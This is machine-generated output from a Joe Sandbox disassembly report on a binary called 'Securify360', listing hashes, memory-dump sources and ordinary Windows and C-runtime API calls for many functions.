                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2999321469-0
                                                                                              • Opcode ID: 171f2fb45658161ba10cb7a3acb80415218f1eec33e7cb7d9423441e285e0907
                                                                                              • Instruction ID: 44a984dfacaa166ad2c5d15ab9a994513b72479c31de58b7685774af44997efb
                                                                                              • Opcode Fuzzy Hash: 171f2fb45658161ba10cb7a3acb80415218f1eec33e7cb7d9423441e285e0907
                                                                                              • Instruction Fuzzy Hash: 2DF0A771A116159ADB01BB768D027DE72946F81771F114206A420FB1D1CF7CCA02FF55
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FA5AEF
                                                                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FA5B1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell__memset
                                                                                              • String ID:
                                                                                              • API String ID: 928536360-0
                                                                                              • Opcode ID: a3a4e755c47ed94e4dabb7892fa19974e50c6e10897522c2ddbe5992934bc28f
                                                                                              • Instruction ID: f84a6ba1760fef3c6ffa591f127da9b4dc87a23f73bbc6b31c3a4653f82b1345
                                                                                              • Opcode Fuzzy Hash: a3a4e755c47ed94e4dabb7892fa19974e50c6e10897522c2ddbe5992934bc28f
                                                                                              • Instruction Fuzzy Hash: 6DF082708043089BD7A29B249C4679677BC970130CF0001E9BA889628ADB7A4B88DF51
                                                                                              APIs
                                                                                              • ___crtCorExitProcess.LIBCMT ref: 00FB32D5
                                                                                                • Part of subcall function 00FB329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00FB32DA,00FB1003,?,00FB9EEE,000000FF,0000001E,0104CE28,00000008,00FB9E52,00FB1003,00FB1003), ref: 00FB32AA
                                                                                                • Part of subcall function 00FB329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00FB32BC
                                                                                              • ExitProcess.KERNEL32 ref: 00FB32DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                              • String ID:
                                                                                              • API String ID: 2427264223-0
                                                                                              • Opcode ID: df3a25db29b0505ff035a08a8c310f5c00b4f6c2fe5fa2d22fdb3f67bbcf3742
                                                                                              • Instruction ID: 47d46d0b7bcbe727302c4045117f5e3194d91f8558d117298a78ac9c90f2a29b
                                                                                              • Opcode Fuzzy Hash: df3a25db29b0505ff035a08a8c310f5c00b4f6c2fe5fa2d22fdb3f67bbcf3742
                                                                                              • Instruction Fuzzy Hash: 23B09230000308BBCB112F12DC0A8893F2DFB00A90B108120F80408029DF77AA92AE84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString$__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 207118244-0
                                                                                              • Opcode ID: 11248f2cbc1e49580067de373c90aa9772c22103f88678f08d00211b86847173
                                                                                              • Instruction ID: 3db41a3042f191e1f64fbba57eb0bb40e7487e866cc8325032a98520977060b8
                                                                                              • Opcode Fuzzy Hash: 11248f2cbc1e49580067de373c90aa9772c22103f88678f08d00211b86847173
                                                                                              • Instruction Fuzzy Hash: E0B17E74A0010ADFEB15EF98C841DFEB7B5FF48710F10819AF915A7291EB75AA41CB50
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4104443479-0
                                                                                              • Opcode ID: 123cc7aa4f2bf7ae9bb9146e7391595874573137e5658805fe5879185853b5ad
                                                                                              • Instruction ID: a7f6f7c14ae6bd6c4bbfdd83c2d5f406f244f44dcf75a474fd3126cb8fee4060
                                                                                              • Opcode Fuzzy Hash: 123cc7aa4f2bf7ae9bb9146e7391595874573137e5658805fe5879185853b5ad
                                                                                              • Instruction Fuzzy Hash: 7131B4B9A04A02DFC724DF19D490A62F7A0FF4A360714C569FD8A8B755DB30ED81EB90
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: ad0ef8523883efa1bec3e8d9b499f4c9286b9e08eb8151df8485e1987fab79c4
                                                                                              • Instruction ID: bb347a3f764cc7b90b1c6416f73dab72b2654dce603137116ff36bb55f83096c
                                                                                              • Opcode Fuzzy Hash: ad0ef8523883efa1bec3e8d9b499f4c9286b9e08eb8151df8485e1987fab79c4
                                                                                              • Instruction Fuzzy Hash: AA410974908351CFEB24DF14C594B1ABBE1BF45318F1988ACE4898B362C336E885DB52
                                                                                              APIs
                                                                                                • Part of subcall function 00FA4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00FA4B63
                                                                                                • Part of subcall function 00FB547B: __wfsopen.LIBCMT ref: 00FB5486
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FA27AF,?,00000001), ref: 00FA49F4
                                                                                                • Part of subcall function 00FA4ADE: FreeLibrary.KERNEL32(00000000), ref: 00FA4B18
                                                                                                • Part of subcall function 00FA48B0: _memmove.LIBCMT ref: 00FA48FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1396898556-0
                                                                                              • Opcode ID: be88fca308adea837b69556b2362d5809225c0775f52a131a06e315745756c3e
                                                                                              • Instruction ID: 36ce007b2c346141f6c7645b961b5c84147a8ee4579011b9730e4ccb3c2de699
                                                                                              • Opcode Fuzzy Hash: be88fca308adea837b69556b2362d5809225c0775f52a131a06e315745756c3e
                                                                                              • Instruction Fuzzy Hash: BF11C472650209ABCB14EF60CC02FAE77A99F82711F10842DF541A6191EEFDAA15BB94
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 33383bb03d5d69c0232ddda13f92186201b496c437488ae724e645324712c658
                                                                                              • Instruction ID: a420fedeefb1c374748c01c0c0c1d5989b9a9f539fffd5c7da305fc0198e34d0
                                                                                              • Opcode Fuzzy Hash: 33383bb03d5d69c0232ddda13f92186201b496c437488ae724e645324712c658
                                                                                              • Instruction Fuzzy Hash: 322124B4908341DFDB24DF14C854B1ABBE1BF88714F05896CF88A97362C735E849EB92
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4104443479-0
                                                                                              • Opcode ID: c26ee0b26c3c861db2cbc4bf0a203224727821ed064f586d54fa749b37ecb7d0
                                                                                              • Instruction ID: eb69a1fa9a4aca0ce12b8b7a243b51d9926ee48b25aafdecfb4718023bd164e2
                                                                                              • Opcode Fuzzy Hash: c26ee0b26c3c861db2cbc4bf0a203224727821ed064f586d54fa749b37ecb7d0
                                                                                              • Instruction Fuzzy Hash: 1801D6B36017016ED3245B39DC06BB7BB98EB457A0F11862AF51ACA1D1EA35E440AB90
                                                                                              APIs
                                                                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 01004998
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID:
                                                                                              • API String ID: 1431749950-0
                                                                                              • Opcode ID: 65c85cf26c7707d98e0301c51d3c1ea1ae9d135c5218dad72b2413c358f7d604
                                                                                              • Instruction ID: 09017cf3d12c1e615a572a90a4d9e16bdff168779a6664bf7aaa4b11e911ce42
                                                                                              • Opcode Fuzzy Hash: 65c85cf26c7707d98e0301c51d3c1ea1ae9d135c5218dad72b2413c358f7d604
                                                                                              • Instruction Fuzzy Hash: 16F03135608208AF9B15FB65DC46CAF77BCEF45720B004056F9089B261DE75B941DB50
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fseek
                                                                                              • String ID:
                                                                                              • API String ID: 2937370855-0
                                                                                              • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                              • Instruction ID: 2cdfe8d2201032738957f5ed535c17c43deda84629f879e4c9f4bfe20ba61979
                                                                                              • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                              • Instruction Fuzzy Hash: 32F08CB6400208FFDF108F45DC00DEF7B7DEB85720F004198F9045A211D272EA21ABB0
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,?,?,00FA27AF,?,00000001), ref: 00FA4A63
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: ad1fe135c02aa8f57e83a7ce9c417d4f734063c47a6a524957e5768b29e6a7a4
                                                                                              • Instruction ID: 6c54fa1ed5f576709eafe7b06eb9f8af503847e17bd70dcea541cda43365c7db
                                                                                              • Opcode Fuzzy Hash: ad1fe135c02aa8f57e83a7ce9c417d4f734063c47a6a524957e5768b29e6a7a4
                                                                                              • Instruction Fuzzy Hash: FBF030B2545701CFCB349F64D490816BBF4BF55325324893EE1D783610C7BAA984EF44
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                              • Instruction ID: dc6c6b842182d5688254fc694c6ce379f78f65c424b4bc4c75eadc945675f3fa
                                                                                              • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                              • Instruction Fuzzy Hash: 05F0F87240020DFFDF05CF90C941EAABB79FB15314F208589F9198A252D776EA61EB91
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB09E4
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2514874351-0
                                                                                              • Opcode ID: f7ace85b21de5d6d7dc07cd0665f94e2e04259a87a1f22930fe5549b6cdecff9
                                                                                              • Instruction ID: cf22f0f91edab0cd13d29573ecd66cf54f207e6bbd0750b3b976c30510067d7e
                                                                                              • Opcode Fuzzy Hash: f7ace85b21de5d6d7dc07cd0665f94e2e04259a87a1f22930fe5549b6cdecff9
                                                                                              • Instruction Fuzzy Hash: 5BE0863290022857C72195989C06FEA77DDEF89690F0541B6FC08D7208D9699C9186D1
                                                                                              APIs
                                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00FF4D31
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderPath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3334745507-0
                                                                                              • Opcode ID: 0414b42d7a1ac5872604e02c937e0ed1b7f7a1a01d38469eb14c973660e6e7ad
                                                                                              • Instruction ID: 3c75e3ad9ac024822c77a0d2b58695b3d60121439519db4e244899b48ea6b15f
                                                                                              • Opcode Fuzzy Hash: 0414b42d7a1ac5872604e02c937e0ed1b7f7a1a01d38469eb14c973660e6e7ad
                                                                                              • Instruction Fuzzy Hash: ABD05EB190032C2BDB70EAA49C0DDB77BACE744224F0006A1BCACC3105ED28AD4586E0
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,00000000,00000000,?), ref: 00FF77DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: ab42bd4f6f1ac6be30b9e44e909aeff65ed682961643b3ce3740e10b92932576
                                                                                              • Instruction ID: 3e90897425163e1a94721651ecd8c37036d64c9c0dd285da9f0b2f14dbdcd45b
                                                                                              • Opcode Fuzzy Hash: ab42bd4f6f1ac6be30b9e44e909aeff65ed682961643b3ce3740e10b92932576
                                                                                              • Instruction Fuzzy Hash: 22D012724383187F6628AB64DC46C77B69CE905121340036EF90581500E6A1BC0086A0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 197181222-0
                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction ID: 9708698f8020037b0def542b205f19d2fde21a0cacdb72d14643b01ede2c1018
                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction Fuzzy Hash: 21B09B7544010C77CE011942EC03B553B195740664F404010FB0C1C161A57795605585
                                                                                              APIs
                                                                                              • _doexit.LIBCMT ref: 00FB3592
                                                                                                • Part of subcall function 00FB3459: __lock.LIBCMT ref: 00FB3467
                                                                                                • Part of subcall function 00FB3459: DecodePointer.KERNEL32(0104CB70,0000001C,00FB33B2,00FB1003,00000001,00000000,?,00FB3300,000000FF,?,00FB9E5E,00000011,00FB1003,?,00FB9CAC,0000000D), ref: 00FB34A6
                                                                                                • Part of subcall function 00FB3459: DecodePointer.KERNEL32(?,00FB3300,000000FF,?,00FB9E5E,00000011,00FB1003,?,00FB9CAC,0000000D), ref: 00FB34B7
                                                                                                • Part of subcall function 00FB3459: EncodePointer.KERNEL32(00000000,?,00FB3300,000000FF,?,00FB9E5E,00000011,00FB1003,?,00FB9CAC,0000000D), ref: 00FB34D0
                                                                                                • Part of subcall function 00FB3459: DecodePointer.KERNEL32(-00000004,?,00FB3300,000000FF,?,00FB9E5E,00000011,00FB1003,?,00FB9CAC,0000000D), ref: 00FB34E0
                                                                                                • Part of subcall function 00FB3459: EncodePointer.KERNEL32(00000000,?,00FB3300,000000FF,?,00FB9E5E,00000011,00FB1003,?,00FB9CAC,0000000D), ref: 00FB34E6
                                                                                                • Part of subcall function 00FB3459: DecodePointer.KERNEL32(?,00FB3300,000000FF,?,00FB9E5E,00000011,00FB1003,?,00FB9CAC,0000000D), ref: 00FB34FC
                                                                                                • Part of subcall function 00FB3459: DecodePointer.KERNEL32(?,00FB3300,000000FF,?,00FB9E5E,00000011,00FB1003,?,00FB9CAC,0000000D), ref: 00FB3507
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 2158581194-0
                                                                                              • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                              • Instruction ID: da1803c471437b3244617c9ca3d377a0353aa6151f26762175a589e5a1c82dda
                                                                                              • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                              • Instruction Fuzzy Hash: 24B012319C030C73DA112542EC03F553B0C4740B50F110020FA0C1C1E1A5D3766054C9
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0101D208
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101D249
